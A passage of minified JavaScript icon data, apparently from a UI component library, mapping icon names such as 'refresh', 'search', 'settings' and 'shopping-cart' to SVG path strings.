2-.9 2-2-.9-2-2-2zm12 6H7c-.55 0-1 .45-1 1v2c0 .55.45 1 1 1h8c.55 0 1-.45 1-1V7c0-.55-.45-1-1-1z"],"publish-function":["M12.16 3.76c.15-.11.3-.16.47-.16.06 0 .17.02.34.06.16.04.31.06.43.06a.58.58 0 0 0 .6-.6c0-.19-.06-.33-.17-.44-.11-.11-.28-.16-.49-.16-.19 0-.37.04-.54.13-.17.09-.39.27-.65.55-.2.21-.48.58-.87 1.11a5.22 5.22 0 0 0-.78-1.79l-2.05.32-.04.21c.15-.03.28-.04.39-.04.2 0 .37.08.5.25.21.26.5 1.03.88 2.33-.29.36-.49.6-.6.71-.18.19-.33.31-.45.36-.09.04-.19.07-.3.07-.09 0-.23-.04-.42-.13a.904.904 0 0 0-.36-.09c-.2 0-.36.06-.49.18a.59.59 0 0 0-.19.46c0 .18.06.32.18.43.12.11.28.16.48.16.2 0 .38-.04.55-.12.17-.08.39-.24.65-.49s.62-.65 1.07-1.19c.18.52.33.89.46 1.13.13.24.28.4.44.51.17.1.37.16.62.16.24 0 .49-.08.74-.25.33-.21.66-.58 1.01-1.09l-.21-.11c-.23.31-.41.5-.52.57a.44.44 0 0 1-.26.07c-.12 0-.24-.07-.36-.21-.2-.24-.46-.91-.8-2 .29-.49.54-.81.74-.96zM6.37 5.83l.68-2.53h.83l.2-.64h-.84c.24-.91.56-1.59.96-2.01.24-.27.48-.4.71-.4.05 0 .08.01.11.04s.04.06.04.1c0 .04-.03.11-.1.21-.06.1-.1.2-.1.29 0 .13.05.24.15.33.1.09.23.14.39.14.17 0 .31-.06.42-.17.12-.12.18-.27.18-.46 0-.21-.08-.39-.25-.52C9.57.07 9.3 0 8.93 0c-.59 0-1.12.16-1.59.48-.48.32-.93.85-1.36 1.59-.15.26-.29.42-.42.49s-.35.11-.64.1l-.19.65h.81L4.35 7.68c-.2.72-.33 1.16-.4 1.33-.1.24-.26.45-.46.62a.48.48 0 0 1-.31.1c-.03 0-.06-.01-.08-.03l-.03-.03c0-.02.03-.06.09-.11.06-.06.09-.15.09-.26 0-.13-.05-.23-.14-.32-.1-.09-.23-.13-.41-.13-.21 0-.38.05-.51.16A.52.52 0 0 0 2 9.4c0 .16.08.3.23.42.16.12.4.18.74.18.53 0 .99-.13 1.4-.39.41-.26.76-.65 1.07-1.19.3-.53.61-1.39.93-2.59zm2.34 3.46A.997.997 0 0 0 8 9c-.28 0-.53.11-.71.29l-2 2a1.003 1.003 0 0 0 1.42 1.42l.29-.3V15c0 .55.45 1 1 1s1-.45 1-1v-2.59l.29.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71l-2-2z"],pulse:["M15 8h-1.46l-1.7-2.55-.02.01A.984.984 0 0 0 11 5c-.43 0-.79.27-.93.65h-.01l-1.69 4.51-1.38-8.32h-.02A.989.989 0 0 0 6 1c-.41 0-.77.25-.92.61L2.34 8H1c-.55 0-1 .45-1 1s.45 1 1 1h2c.41 0 .77-.25.92-.61l1.65-3.86 1.44 8.63h.02c.08.47.47.84.97.84.43 0 .79-.27.93-.65h.01l2.31-6.17.92 1.38.02-.01c.17.26.46.45.81.45h2c.55 0 1-.45 1-1s-.45-1-1-1z"],random:["M11.48 4h1.11l-.29.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l2-2c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71l-2-2a1.003 1.003 0 0 0-1.42 1.42l.3.29H11c-.32 0-.59.16-.77.38l-.01-.01L8.28 4.8l1.28 1.6L11.48 4zm2.23 6.29a1.003 1.003 0 0 0-1.42 1.42l.3.29h-1.11l-7.7-9.62h-.01A.996.996 0 0 0 3 2H1c-.55 0-1 .45-1 1s.45 1 1 1h1.52l7.7 9.62.01-.01c.18.23.45.39.77.39h1.59l-.29.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l2-2c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71l-2-2zM2.52 12H1c-.55 0-1 .45-1 1s.45 1 1 1h2c.32 0 .59-.16.77-.38l.01.01 1.94-2.42L4.44 9.6 2.52 12z"],record:["M8 3a5 5 0 1 0 0 10A5 5 0 1 0 8 3z"],redo:["M12 11c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm3.71-6.71l-3-3a1.003 1.003 0 0 0-1.42 1.42L12.59 4H5C2.24 4 0 6.24 0 9s2.24 5 5 5h4v-2H5c-1.66 0-3-1.34-3-3s1.34-3 3-3h7.59L11.3 7.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l3-3c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71z"],refresh:["M14.99 6.99c-.55 0-1 .45-1 1 0 3.31-2.69 6-6 6-1.77 0-3.36-.78-4.46-2h1.46c.55 0 1-.45 1-1s-.45-1-1-1h-4c-.55 0-1 .45-1 1v4c0 .55.45 1 1 1s1-.45 1-1v-1.74a7.95 7.95 0 0 0 6 2.74c4.42 0 8-3.58 8-8 0-.55-.45-1-1-1zm0-7c-.55 0-1 .45-1 1v1.74a7.95 7.95 0 0 0-6-2.74c-4.42 0-8 3.58-8 8 0 .55.45 1 1 1s1-.45 1-1c0-3.31 2.69-6 6-6 1.77 0 3.36.78 4.46 2h-1.46c-.55 0-1 .45-1 1s.45 1 1 1h4c.55 0 1-.45 1-1v-4c0-.55-.45-1-1-1z"],"regression-chart":["M13 6.5c0 .83.67 1.5 1.5 1.5S16 7.33 16 6.5 15.33 5 14.5 5 13 5.67 13 6.5zM8.5 5c.83 0 1.5-.67 1.5-1.5S9.33 2 8.5 2 7 2.67 7 3.5 7.67 5 8.5 5zM9 9.5c0 .83.67 1.5 1.5 1.5s1.5-.67 1.5-1.5S11.33 8 10.5 8 9 8.67 9 9.5zM4.5 8C5.33 8 6 7.33 6 6.5S5.33 5 4.5 5 3 5.67 3 6.5 3.67 8 4.5 8zM15 12H3.26l12.03-8.59-.58-.81L2 11.67V3c0-.55-.45-1-1-1s-1 .45-1 1v10c0 .55.45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1z"],remove:["M10.99 6.99h-6c-.55 0-1 .45-1 1s.45 1 1 1h6c.55 0 1-.45 1-1s-.45-1-1-1zm-3-7c-4.42 0-8 3.58-8 8s3.58 8 8 8 8-3.58 8-8-3.58-8-8-8zm0 14c-3.31 0-6-2.69-6-6s2.69-6 6-6 6 2.69 6 6-2.68 6-6 6z"],"remove-column":["M14 0H4c-.55 0-1 .45-1 1v3h2V2h3v12H5v-2H3v3c0 .55.45 1 1 1h10c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-1 14h-3V2h3v12zm-8.71-3.29a1.003 1.003 0 0 0 1.42-1.42L4.41 8 5.7 6.71c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71L3 6.59l-1.29-1.3A1.003 1.003 0 0 0 .29 6.71L1.59 8 .29 9.29a1.003 1.003 0 0 0 1.42 1.42L3 9.41l1.29 1.3z"],"remove-column-left":["M4 9h4c.55 0 1-.45 1-1s-.45-1-1-1H4c-.55 0-1 .45-1 1s.45 1 1 1zm11-9H1C.45 0 0 .45 0 1v14c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-5 14H2V2h8v12zm4 0h-3V2h3v12z"],"remove-column-right":["M15 0H1C.45 0 0 .45 0 1v14c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zM5 14H2V2h3v12zm9 0H6V2h8v12zM8 9h4c.55 0 1-.45 1-1s-.45-1-1-1H8c-.55 0-1 .45-1 1s.45 1 1 1z"],"remove-row-bottom":["M15 0H1C.45 0 0 .45 0 1v14c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-1 14H2V6h12v8zm0-9H2V2h12v3zm-8 6h4c.55 0 1-.45 1-1s-.45-1-1-1H6c-.55 0-1 .45-1 1s.45 1 1 1z"],"remove-row-top":["M15 0H1C.45 0 0 .45 0 1v14c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-1 14H2v-3h12v3zm0-4H2V2h12v8zM6 7h4c.55 0 1-.45 1-1s-.45-1-1-1H6c-.55 0-1 .45-1 1s.45 1 1 1z"],repeat:["M10 5c0 .55.45 1 1 1h4c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1s-1 .45-1 1v1.74A7.95 7.95 0 0 0 8 0C3.58 0 0 3.58 0 8c0 4.06 3.02 7.4 6.94 7.92.02 0 .04.01.06.01.33.04.66.07 1 .07 4.42 0 8-3.58 8-8 0-.55-.45-1-1-1s-1 .45-1 1c0 3.31-2.69 6-6 6-.71 0-1.37-.15-2-.38v.01C3.67 12.81 2 10.61 2 8c0-3.31 2.69-6 6-6 1.77 0 3.36.78 4.46 2H11c-.55 0-1 .45-1 1z"],resolve:["M6.6 3.3C6.1 3.1 5.6 3 5 3 2.2 3 0 5.2 0 8s2.2 5 5 5c.6 0 1.1-.1 1.6-.3C5.3 11.6 4.5 9.9 4.5 8s.8-3.6 2.1-4.7zM8 4c-1.2.9-2 2.4-2 4s.8 3.1 2 4c1.2-.9 2-2.3 2-4s-.8-3.1-2-4zm3-1c-.6 0-1.1.1-1.6.3 1.3 1.2 2.1 2.9 2.1 4.7s-.8 3.6-2.1 4.7c.5.2 1 .3 1.6.3 2.8 0 5-2.2 5-5s-2.2-5-5-5z"],rig:["M5.71 3c0 1.1.96 2 2.14 2C9.04 5 10 3.96 10 3c0-1.96-1.47-3-2.14-3H5c0 1.96 2.68 1.4.71 3zm2.5 3l.01.01s0-.01-.01-.01zm6.5 8.29L10 9.59V7c0-.55-.45-1-1-1H7c-.55 0-1 .45-1 1v2.58l-4.71 4.7c-.18.19-.29.44-.29.72a1.003 1.003 0 0 0 1.71.71L6 12.42V15c0 .55.45 1 1 1h2c.55 0 1-.45 1-1v-2.58l3.29 3.29a1.003 1.003 0 0 0 1.42-1.42z"],"right-join":["M6.6 3.3C5.3 4.4 4.5 6.1 4.5 8s.8 3.6 2.1 4.7c-.5.2-1 .3-1.6.3-2.8 0-5-2.2-5-5s2.2-5 5-5c.6 0 1.1.1 1.6.3zm-1.96 8.68C3.92 10.83 3.5 9.46 3.5 8s.42-2.83 1.14-3.98C2.6 4.2 1 5.91 1 8s1.6 3.8 3.64 3.98zM8 4c-1.2.9-2 2.4-2 4s.8 3.1 2 4c1.2-.9 2-2.3 2-4s-.8-3.1-2-4zm3-1c2.8 0 5 2.2 5 5s-2.2 5-5 5c-.6 0-1.1-.1-1.6-.3 1.3-1.1 2.1-2.9 2.1-4.7s-.8-3.5-2.1-4.7c.5-.2 1-.3 1.6-.3z"],ring:["M8 0C3.58 0 0 3.58 0 8s3.58 8 8 8 8-3.58 8-8-3.58-8-8-8zm0 12c-2.21 0-4-1.79-4-4s1.79-4 4-4 4 1.79 4 4-1.79 4-4 4z"],"rotate-document":["M12 2h-1.59l.29-.29c.19-.18.3-.43.3-.71A1.003 1.003 0 0 0 9.29.29l-2 2C7.11 2.47 7 2.72 7 3c0 .28.11.53.29.71l2 2a1.003 1.003 0 0 0 1.42-1.42l-.3-.29H12c.55 0 1 .45 1 1v3c0 .55.45 1 1 1s1-.45 1-1V5c0-1.66-1.34-3-3-3zM5.71 5.29A.997.997 0 0 0 5 5H1c-.55 0-1 .45-1 1v9c0 .55.45 1 1 1h7c.55 0 1-.45 1-1V9c0-.28-.11-.53-.29-.71l-3-3zM7 14H2V7h2v2c0 .55.45 1 1 1h2v4z"],"rotate-page":["M8 6H2c-.55 0-1 .45-1 1v8c0 .55.45 1 1 1h6c.55 0 1-.45 1-1V7c0-.55-.45-1-1-1zm-1 8H3V8h4v6zm5-12h-1.59l.29-.29c.19-.18.3-.43.3-.71A1.003 1.003 0 0 0 9.29.29l-2 2C7.11 2.47 7 2.72 7 3c0 .28.11.53.29.71l2 2a1.003 1.003 0 0 0 1.42-1.42l-.3-.29H12c.55 0 1 .45 1 1v3c0 .55.45 1 1 1s1-.45 1-1V5c0-1.66-1.34-3-3-3z"],satellite:["M3 9c0-.6.4-1 1-1s1 .4 1 1c0 1.1.9 2 2 2 .6 0 1 .4 1 1s-.4 1-1 1c-2.2 0-4-1.8-4-4zM0 9c0-.6.4-1 1-1s1 .4 1 1c0 2.8 2.2 5 5 5 .6 0 1 .4 1 1s-.4 1-1 1c-3.9 0-7-3.1-7-7zm7 1c-.6 0-1-.4-1-1s.4-1 1-1 1 .4 1 1-.4 1-1 1zm1.3-2.8c-.4-.4-.4-1 0-1.4l4.5-4.5c.4-.4 1-.4 1.4 0l.5.5c.4.4.4 1 0 1.4l-4.5 4.5c-.4.4-1 .4-1.4 0l-.5-.5zM5.2.3c.4-.4 1-.4 1.4 0l2.1 2.1c.4.4.4 1 0 1.4l-.9.9c-.4.4-1 .4-1.4 0L4.3 2.6c-.4-.4-.4-1 0-1.4l.9-.9zm7 7c.4-.4 1-.4 1.4 0l2.1 2.1c.4.4.4 1 0 1.4l-.9.9c-.4.4-1 .4-1.4 0l-2.1-2.1c-.4-.4-.4-1 0-1.4l.9-.9z"],saved:["M6.71 9.29a1.003 1.003 0 0 0-1.42 1.42l2 2a.997.997 0 0 0 1.6-.27h.01l2-4h-.01c.06-.13.11-.28.11-.44 0-.55-.45-1-1-1-.39 0-.72.23-.89.56H9.1l-1.38 2.76-1.01-1.03zM9 0H3c-.55 0-1 .45-1 1v14c0 .55.45 1 1 1h10c.55 0 1-.45 1-1V5L9 0zm3 14H4V2h4v4h4v8z"],"scatter-plot":["M15 12H2V3c0-.55-.45-1-1-1s-1 .45-1 1v10c0 .55.45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1zm-.5-7c.83 0 1.5-.67 1.5-1.5S15.33 2 14.5 2 13 2.67 13 3.5 13.67 5 14.5 5zm-3 4c.83 0 1.5-.67 1.5-1.5S12.33 6 11.5 6 10 6.67 10 7.5 10.67 9 11.5 9zm-4-2C8.33 7 9 6.33 9 5.5S8.33 4 7.5 4 6 4.67 6 5.5 6.67 7 7.5 7zm-3 4c.83 0 1.5-.67 1.5-1.5S5.33 8 4.5 8 3 8.67 3 9.5 3.67 11 4.5 11z"],search:["M15.55 13.43l-2.67-2.68a6.94 6.94 0 0 0 1.11-3.76c0-3.87-3.13-7-7-7s-7 3.13-7 7 3.13 7 7 7c1.39 0 2.68-.42 3.76-1.11l2.68 2.67a1.498 1.498 0 1 0 2.12-2.12zm-8.56-1.44c-2.76 0-5-2.24-5-5s2.24-5 5-5 5 2.24 5 5-2.24 5-5 5z"],"search-around":["M13.5 11c-.51 0-.98.15-1.38.42l-2.4-2.41c.17-.3.28-.64.28-1.01s-.11-.71-.28-1.01l2.41-2.41c.39.27.86.42 1.37.42a2.5 2.5 0 0 0 0-5A2.5 2.5 0 0 0 11 2.5c0 .51.15.98.42 1.38l-2.41 2.4C8.71 6.11 8.37 6 8 6s-.71.11-1.01.28l-2.41-2.4c.27-.4.42-.87.42-1.38a2.5 2.5 0 0 0-5 0A2.5 2.5 0 0 0 2.5 5c.51 0 .98-.15 1.38-.42l2.41 2.41C6.11 7.29 6 7.63 6 8s.11.71.28 1.01l-2.41 2.41c-.39-.27-.86-.42-1.37-.42a2.5 2.5 0 0 0 0 5A2.5 2.5 0 0 0 5 13.5c0-.51-.15-.98-.42-1.38l2.41-2.41c.3.18.64.29 1.01.29s.71-.11 1.01-.28l2.41 2.41c-.27.39-.42.86-.42 1.37a2.5 2.5 0 0 0 5 0 2.5 2.5 0 0 0-2.5-2.5zm0-10c.83 0 1.5.67 1.5 1.5S14.33 4 13.5 4 12 3.33 12 2.5 12.67 1 13.5 1zm-11 3C1.67 4 1 3.33 1 2.5S1.67 1 2.5 1 4 1.67 4 2.5 3.33 4 2.5 4zm0 11c-.83 0-1.5-.67-1.5-1.5S1.67 12 2.5 12s1.5.67 1.5 1.5S3.33 15 2.5 15zm11 0c-.83 0-1.5-.67-1.5-1.5s.67-1.5 1.5-1.5 1.5.67 1.5 1.5-.67 1.5-1.5 1.5z"],"search-template":["M15.55 13.43l-2.67-2.67c.7-1.09 1.11-2.38 1.11-3.77 0-3.87-3.13-7-7-7s-7 3.13-7 7 3.13 7 7 7c1.39 0 2.68-.41 3.77-1.11l2.67 2.67a1.498 1.498 0 1 0 2.12-2.12zm-8.56-1.44c-2.76 0-5-2.24-5-5s2.24-5 5-5 5 2.24 5 5-2.24 5-5 5zm2.5-6h-5c-.28 0-.5.22-.5.5s.22.5.5.5h5c.28 0 .5-.22.5-.5s-.22-.5-.5-.5zm0-2h-5c-.28 0-.5.22-.5.5s.22.5.5.5h5c.28 0 .5-.22.5-.5s-.22-.5-.5-.5zm0 4h-5c-.28 0-.5.22-.5.5s.22.5.5.5h5c.28 0 .5-.22.5-.5s-.22-.5-.5-.5z"],"search-text":["M9 4H5c-.55 0-1 .45-1 1s.45 1 1 1h1v3c0 .55.45 1 1 1s1-.45 1-1V6h1c.55 0 1-.45 1-1s-.45-1-1-1zm6.56 9.44l-2.67-2.67C13.59 9.68 14 8.39 14 7c0-3.87-3.13-7-7-7S0 3.13 0 7s3.13 7 7 7c1.39 0 2.68-.41 3.77-1.11l2.67 2.67a1.498 1.498 0 1 0 2.12-2.12zM7 12c-2.76 0-5-2.24-5-5s2.24-5 5-5 5 2.24 5 5-2.24 5-5 5z"],"segmented-control":["M15 4H1c-.55 0-1 .45-1 1v6c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V5c0-.55-.45-1-1-1zm-1 6H8V6h6v4z"],select:["M16 15c0-.28-.12-.52-.31-.69l.02-.02-3.12-3.12 3.41-.84-8.05-2.86c.03-.09.05-.17.05-.27V2c0-.55-.45-1-1-1H3c0-.55-.45-1-1-1S1 .45 1 1c-.55 0-1 .45-1 1s.45 1 1 1v4c0 .55.45 1 1 1h5.2c.1 0 .18-.02.27-.05L10.33 16l.85-3.41 3.12 3.12.02-.02c.16.19.4.31.68.31.04 0 .07-.02.1-.02s.06.02.1.02c.44 0 .8-.36.8-.8 0-.04-.02-.07-.02-.1s.02-.06.02-.1zM6 6H3V3h3v3z"],selection:["M8 0C3.58 0 0 3.58 0 8s3.58 8 8 8 8-3.58 8-8-3.58-8-8-8zm0 14c-3.31 0-6-2.69-6-6s2.69-6 6-6 6 2.69 6 6-2.69 6-6 6zm0-9C6.34 5 5 6.34 5 8s1.34 3 3 3 3-1.34 3-3-1.34-3-3-3z"],"send-to":["M15 7.5c-.8 0-1.5-.4-2-1l-1.2 1.2c-.4.5-1.1.7-1.8.7-1.4.1-2.5-1-2.5-2.4 0-.7.3-1.3.7-1.8L9.5 3c-.6-.5-1-1.2-1-2 0-.3.1-.7.2-1H8C3.6 0 0 3.6 0 8s3.6 8 8 8 8-3.6 8-8v-.7c-.3.1-.6.2-1 .2zM15 0h-4c-.6 0-1 .5-1 1s.4 1 1 1h1.6L9.3 5.3c-.2.2-.3.4-.3.7 0 .5.4 1 1 1 .3 0 .5-.1.7-.3L14 3.4V5c0 .6.4 1 1 1 .5 0 1-.4 1-1V1c0-.5-.4-1-1-1z"],"send-to-graph":["M6 9H2c-.55 0-1 .45-1 1s.45 1 1 1h1.59L.3 14.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71L5 12.41V14c0 .55.45 1 1 1s1-.45 1-1v-4c0-.55-.45-1-1-1zm8 .5c-.56 0-1.06.23-1.42.59l-2.13-1.24L8.99 8l3.59-2.09A2.002 2.002 0 0 0 16 4.5c0-1.1-.9-2-2-2s-2 .9-2 2c0 .19.03.37.08.54L8.5 7.13v-3.2c.86-.22 1.5-1 1.5-1.93 0-1.1-.9-2-2-2S6 .9 6 2c0 .93.64 1.71 1.5 1.93v3.2l-.88-.52-2.7-1.57c.05-.17.08-.35.08-.54 0-1.1-.9-2-2-2s-2 .9-2 2 .9 2 2 2c.56 0 1.06-.23 1.42-.59l2.13 1.24 3.84 2.24 2.7 1.57c-.06.17-.09.35-.09.54 0 1.1.9 2 2 2s2-.9 2-2-.9-2-2-2z"],"send-to-map":["M6 9H2c-.55 0-1 .45-1 1s.45 1 1 1h1.59L.3 14.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71L5 12.41V14c0 .55.45 1 1 1s1-.45 1-1v-4c0-.55-.45-1-1-1zm9.55-5.83l-4.49-3A.975.975 0 0 0 9.99.15L5.53 2.82 1.56.17A1.003 1.003 0 0 0 0 1v6h2V2.87l2.94 1.96.06.03V7h1V4.86s.01 0 .01-.01L10 2.47v8.67s-.01 0-.01.01l-.99.58v2.33l1.47-.88 3.97 2.65A1.003 1.003 0 0 0 16 15V4c0-.35-.18-.65-.45-.83zM14 13.13l-2.94-1.96c-.02-.01-.04-.02-.05-.03v-8.6l3 2v8.59z"],"series-add":["M10.68 7.9c.44.54 1.07.92 1.79 1.05l-2.76 2.76c-.18.18-.43.29-.71.29s-.53-.11-.71-.3L5 8.41l-3 3V13h13c.55 0 1 .45 1 1s-.45 1-1 1H1c-.55 0-1-.45-1-1V4c0-.55.45-1 1-1s1 .45 1 1v4.59l2.29-2.3C4.47 6.11 4.72 6 5 6s.53.11.71.29L9 9.59l1.68-1.69zM15 3c.55 0 1 .45 1 1s-.45 1-1 1h-1v1c0 .55-.45 1-1 1s-1-.45-1-1V5h-1c-.55 0-1-.45-1-1s.45-1 1-1h1V2c0-.55.45-1 1-1s1 .45 1 1v1h1z"],"series-configuration":["M9.94 9.64c.65.23 1.34.36 2.06.36.14 0 .29-.01.43-.01L9.7 12.71c-.18.18-.43.29-.71.29-.28 0-.53-.11-.71-.3L5 9.41l-3 3V14h12.99c.55 0 1 .45 1 1s-.45 1-1 1H1c-.55 0-1-.45-1-1V5c0-.55.45-1 1-1s1 .45 1 1v4.59l2.29-2.3C4.47 7.11 4.72 7 5 7c.28 0 .53.11.71.29L9 10.59l.94-.95zm4.73-6.44h.92c.22 0 .4.18.4.4v.8c0 .22-.18.4-.4.4h-.93c-.06.2-.14.38-.24.55l.66.65c.15.15.15.4 0 .55l-.54.55c-.15.15-.4.15-.55 0l-.65-.65c-.17.1-.36.18-.55.24v.91c0 .22-.18.4-.4.4h-.8c-.22 0-.4-.18-.4-.4v-.93c-.18-.06-.36-.13-.52-.22l-.68.68c-.15.16-.41.16-.57 0l-.56-.56a.417.417 0 0 1 0-.57l.68-.68c-.08-.16-.16-.33-.22-.52h-.93c-.22 0-.4-.18-.4-.4v-.8c0-.22.18-.4.4-.4h.93c.06-.2.14-.38.24-.55l-.65-.64a.392.392 0 0 1 0-.55l.54-.55a.38.38 0 0 1 .54 0l.65.65c.18-.1.36-.18.55-.24V.4c0-.22.18-.4.4-.4h.8c.22 0 .4.18.4.4v.93c.18.06.35.14.52.22l.68-.68c.15-.16.41-.16.57 0l.57.57c.15.16.15.41 0 .57l-.68.68c.09.16.16.33.22.51zm-4.18.8c0 .83.67 1.5 1.5 1.5s1.5-.67 1.5-1.5-.67-1.5-1.5-1.5c-.82 0-1.5.67-1.5 1.5z"],"series-derived":["M10.66 7.92c.44.54 1.07.91 1.8 1.03L9.71 11.7c-.18.19-.43.3-.71.3s-.53-.11-.71-.3L5 8.41l-3 3V13h13c.55 0 1 .45 1 1s-.45 1-1 1H1c-.55 0-1-.45-1-1V4c0-.55.45-1 1-1s1 .45 1 1v4.59l2.29-2.3C4.47 6.11 4.72 6 5 6s.53.11.71.29L9 9.59l1.66-1.67zM12.3 5.3l.3-.3H8c-.6 0-1-.4-1-1s.4-1 1-1h4.6l-.3-.3c-.2-.2-.3-.4-.3-.7 0-.6.5-1 1-1 .3 0 .5.1.7.3l2 2c.2.2.3.4.3.7s-.1.5-.3.7l-2 2c-.2.2-.4.3-.7.3-.6 0-1-.4-1-1 0-.3.1-.5.3-.7z"],"series-filtered":["M9.29 9.3c.3.62.8 1.12 1.42 1.41l-1 1c-.18.18-.43.29-.71.29s-.53-.11-.71-.3L5 8.41l-3 3V13h13c.55 0 1 .45 1 1s-.45 1-1 1H1c-.55 0-1-.45-1-1V4c0-.55.45-1 1-1s1 .45 1 1v4.59l2.29-2.3C4.47 6.11 4.72 6 5 6s.53.11.71.29L9 9.59l.29-.29zM15.48 1c.31 0 .52.26.52.57 0 .16-.06.3-.17.41l-2.86 2.73v2.63c0 .16-.06.3-.17.41l-.82 1.1c-.1.1-.25.17-.41.17-.31 0-.57-.26-.57-.57V4.71L8.17 1.98A.566.566 0 0 1 8 1.57c0-.31.26-.57.57-.57h6.91z"],"series-search":["M9.6 8.94a4.937 4.937 0 0 0 1.82.01c.1-.01.22-.04.39-.08l.23-.07c.04-.01.08-.02.11-.04l.22.22-2.7 2.72c-.18.19-.43.3-.71.3s-.53-.11-.71-.3L4.98 8.41l-2.99 3V13h12.94c.55 0 1 .45 1 1s-.45 1-1 1H1c-.55 0-1-.45-1-1V3.99c0-.55.45-1 1-1s1 .45 1 1v4.59l2.28-2.3c.17-.18.42-.29.7-.29s.53.11.7.29l3.28 3.3.64-.64zm6.22-.41c.1.12.17.27.18.44 0 .34-.27.61-.61.61a.57.57 0 0 1-.43-.18l-2.24-2.25c-.13.08-.26.16-.4.23-.02.01-.05.02-.07.03-.14.06-.27.12-.42.17h-.01c-.14.05-.29.08-.44.11-.04.01-.08.02-.11.02-.15.02-.3.04-.46.04-1.85 0-3.35-1.51-3.35-3.37S8.96 1.01 10.81 1c1.85 0 3.35 1.51 3.35 3.37 0 .16-.02.31-.04.47-.01.04-.01.07-.02.11-.02.15-.05.29-.1.44v.01c-.05.15-.11.28-.17.42-.01.02-.02.05-.03.07-.07.14-.14.27-.23.4l2.25 2.24zm-5.01-1.94c1.22 0 2.21-.99 2.21-2.22 0-1.23-.99-2.22-2.21-2.22S8.6 3.14 8.6 4.37c0 1.22.99 2.22 2.21 2.22z"],settings:["M3 1c0-.55-.45-1-1-1S1 .45 1 1v3h2V1zm0 4H1c-.55 0-1 .45-1 1v2c0 .55.45 1 1 1h2c.55 0 1-.45 1-1V6c0-.55-.45-1-1-1zm12-4c0-.55-.45-1-1-1s-1 .45-1 1v2h2V1zM9 1c0-.55-.45-1-1-1S7 .45 7 1v6h2V1zM1 15c0 .55.45 1 1 1s1-.45 1-1v-5H1v5zM15 4h-2c-.55 0-1 .45-1 1v2c0 .55.45 1 1 1h2c.55 0 1-.45 1-1V5c0-.55-.45-1-1-1zm-2 11c0 .55.45 1 1 1s1-.45 1-1V9h-2v6zM9 8H7c-.55 0-1 .45-1 1v2c0 .55.45 1 1 1h2c.55 0 1-.45 1-1V9c0-.55-.45-1-1-1zm-2 7c0 .55.45 1 1 1s1-.45 1-1v-2H7v2z"],share:["M10.99 13.99h-9v-9h4.76l2-2H.99c-.55 0-1 .45-1 1v11c0 .55.45 1 1 1h11c.55 0 1-.45 1-1V7.24l-2 2v4.75zm4-14h-5c-.55 0-1 .45-1 1s.45 1 1 1h2.59L7.29 7.28a1 1 0 0 0-.3.71 1.003 1.003 0 0 0 1.71.71l5.29-5.29V6c0 .55.45 1 1 1s1-.45 1-1V1c0-.56-.45-1.01-1-1.01z"],shield:["M8 16c4.667-3.048 7-7.238 7-12.571-1.556 0-3.889-1.143-7-3.429-3.111 2.286-5.444 3.429-7 3.429C1 8.762 3.333 12.952 8 16zM8 2.121c2.005 1.388 3.715 2.304 5.186 2.735-.342 3.702-2.05 6.683-5.186 9.038V2.121z"],shop:["M3 2h10c.55 0 1-.45 1-1s-.45-1-1-1H3c-.55 0-1 .45-1 1s.45 1 1 1zm9 11H4v-3H2v5c0 .55.45 1 1 1h10c.55 0 1-.45 1-1v-5h-2v3zm4-6l-1.01-3.17C14.9 3.36 14.49 3 14 3H2c-.49 0-.9.36-.98.83L.01 7H0c0 1.1.9 2 2 2s2-.9 2-2c0 1.1.9 2 2 2s2-.9 2-2c0 1.1.9 2 2 2s2-.9 2-2c0 1.1.9 2 2 2s2-.9 2-2z"],"shopping-cart":["M14 10H7.72l-.33-1H13c.39 0 .72-.23.89-.56h.01l2-4h-.01c.06-.13.11-.28.11-.44 0-.55-.45-1-1-1H5.39l-.44-1.32h-.01C4.8 1.29 4.44 1 4 1H1c-.55 0-1 .45-1 1s.45 1 1 1h2.28l2.33 7H4c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2h6c0 1.1.9 2 2 2s2-.9 2-2-.9-2-2-2zM6.05 5h7.33l-1 2H6.72l-.67-2z"],"sim-card":["M13.71 4.29l-4-4A.997.997 0 0 0 9 0H3c-.55 0-1 .45-1 1v14c0 .55.45 1 1 1h10c.55 0 1-.45 1-1V5c0-.28-.11-.53-.29-.71zM7 6h2v2H7V6zM4 6h2v2H4V6zm2 8H4v-2h2v2zm3 0H7v-2h2v2zm3 0h-2v-2h2v2zm0-3H4V9h8v2zm0-3h-2V6h2v2z"],slash:["M10 2a.99.99 0 0 0-.96.73l-2.99 9.96A1.003 1.003 0 0 0 7 14c.46 0 .85-.31.96-.73l2.99-9.96A1.003 1.003 0 0 0 10 2z"],"small-cross":["M9.41 8l2.29-2.29c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71L8 6.59l-2.29-2.3a1.003 1.003 0 0 0-1.42 1.42L6.59 8 4.3 10.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71L8 9.41l2.29 2.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71L9.41 8z"],"small-minus":["M11 7H5c-.55 0-1 .45-1 1s.45 1 1 1h6c.55 0 1-.45 1-1s-.45-1-1-1z"],"small-plus":["M11 7H9V5c0-.55-.45-1-1-1s-1 .45-1 1v2H5c-.55 0-1 .45-1 1s.45 1 1 1h2v2c0 .55.45 1 1 1s1-.45 